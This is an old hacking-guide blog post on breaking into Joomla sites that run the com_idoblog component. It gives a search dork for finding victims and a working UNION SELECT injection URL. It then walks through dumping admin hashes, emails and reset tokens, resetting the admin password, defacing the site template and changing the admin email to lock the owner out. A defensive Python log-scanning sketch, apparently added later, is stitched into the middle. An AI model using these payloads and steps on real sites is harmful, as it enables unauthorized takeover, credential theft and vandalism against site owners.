
    Monday, 11 April 2011

    Hacking Administrator Joomla Com_Idoblog

    Hacking Administrator Joomla – Get Full Access!
    Tools required:
    SQL-i Knowledge
    reiluke SQLiHelper 2.7
    Joomla! Query Knowledge
    Finding Exploit And Target
    These two steps can happen in either order, depending on which you find first: the target or the exploit…
    Google dork: inurl:"option=com_idoblog"
    This returns about 140,000 pages.
    [Image: 001cv.png]
    At inj3ct0r.com, search for: com_idoblog
    This returns: Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
    [Image: 002rg.png]
    ==
    Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
    ==
    index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
    The exploit can be separated into two parts:
    Part I
    index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
    This part opens the blog's Admin profile page; if that page doesn't exist, the exploit won't work (not completely confirmed).
    Part II
    +union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
    This part looks up the username and password in the jos_users table.
    Testing Vulnerability
    Disable images for faster page loading:
    [Firefox]
    Tools >> Options >> Content (tab menu) >> and uncheck 'Load images automatically'
    Go to:
    Code:
    http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
    The site loads normally…
    Go to:
    Code:
    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
    The site shows the blog's Admin profile.
    Go to:
    Code:
    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
    The site is vulnerable.
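
Seen from the server side, the requests above leave a clear trace in the web access log. The following detection sketch is an added example, not part of the original post: it flags any `com_idoblog` request whose `userid` is not a plain integer and notes whether the same client then requests the `com_user` reset page used further down. The log format (Apache combined style), the integer-only assumption for `userid`, and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined-log style); the IPs are documentation addresses.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Apr/2011:10:01:02 +0000] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=22 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Apr/2011:10:01:09 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62 HTTP/1.1" 200 4811',
    '203.0.113.7 - - [11/Apr/2011:10:01:15 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1-- HTTP/1.1" 200 4790',
    '198.51.100.9 - - [11/Apr/2011:10:02:30 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3300',
    '203.0.113.7 - - [11/Apr/2011:10:04:41 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3300',
    '198.51.100.9 - - [11/Apr/2011:10:05:00 +0000] "GET /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=70 HTTP/1.1" 200 4650',
]

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate userid is always a plain decimal integer.
NUMERIC = re.compile(r"[0-9]+")


def scan(lines):
    """Map client IP -> non-numeric userid values seen, plus a reset-page follow-up flag."""
    findings = {}
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line in the assumed format
        ip, target = match.groups()
        # parse_qs URL-decodes values, so "+" and "%20" both arrive as spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        option = params.get("option", [""])[0]
        if option == "com_idoblog":
            for value in params.get("userid", []):
                if not NUMERIC.fullmatch(value):
                    entry = findings.setdefault(ip, {"bad_userid": [], "reset_after": False})
                    entry["bad_userid"].append(value)
        elif option == "com_user" and params.get("view", [""])[0] == "reset":
            # Only meaningful as a follow-up from a client that was already flagged.
            if ip in findings:
                findings[ip]["reset_after"] = True
    return findings


if __name__ == "__main__":
    for ip, hit in scan(SAMPLE_LOG).items():
        print(ip, hit)
```

Log matching only surfaces attempts; the durable fix is for the component to handle `userid` as an integer (or through a parameterised query) and for the site to update or remove the affected com_idoblog version.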
    Inject Target
    Open reiluke SQLiHelper 2.7
    In the Target field, paste:
    Code:
    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
    and click on Inject
    Follow the standard steps until you find Column Name; as a result we have:
    [Image: 003bd.png]
    Notice that the exploit from inj3ct0r wouldn't work here because it looks for the jos_users table and, as you can see, our target uses the jos153_users table for storing data.
    Let's dump username, email and password from Column Name jos153_users. Click on Dump Now.
    [Image: 004k.png]
    username: admin
    email: info@site.com
    password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
    Joomla! 1.5.x uses MD5 to hash the passwords. When the passwords are created, they are hashed with a 32-character salt that is appended to the end of the password string. The password is stored as {TOTAL HASH}:{ORIGINAL SALT}. So cracking that password takes a lot of time…
    The easiest way in is to reset the Admin password!
    Admin Password Reset
    Go to:
    Code:
    http://www.site.com/index.php?option=com_user&view=reset
    This is the standard Joomla! query for a password reset request.
    [Image: 005hy.png]
    The Forgot your Password? page will load.
    In E-mail Address, enter the admin email (in our case it is info@site.com) and press Submit.
    If you found the right admin email, the Confirm your account. page will load, asking for a Token:
    Finding Token
    To find the token, go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users
    [Image: 006fj.png]
    username: admin
    activation: 5482dd177624761a290224270fa55f1d
    5482dd177624761a290224270fa55f1d is the 32-character verification token; enter it and press Submit.
    [Image: 007pa.png]
    If you did everything right, the Reset your Password page will load. Enter your new password…
    After that go to:
    Code:
    http://www.site.com/administrator/
    Standard Joomla portal content management system
    Enter username admin and your password, click on Login
    Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
    In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
    [Image: 008bo.png]
    To make the admin's life more miserable, click on admin in the main Joomla window and, in the User Details page, change the admin E-mail
    [Image: 009kw.png]
    Credit: MindFreak [HckGuide]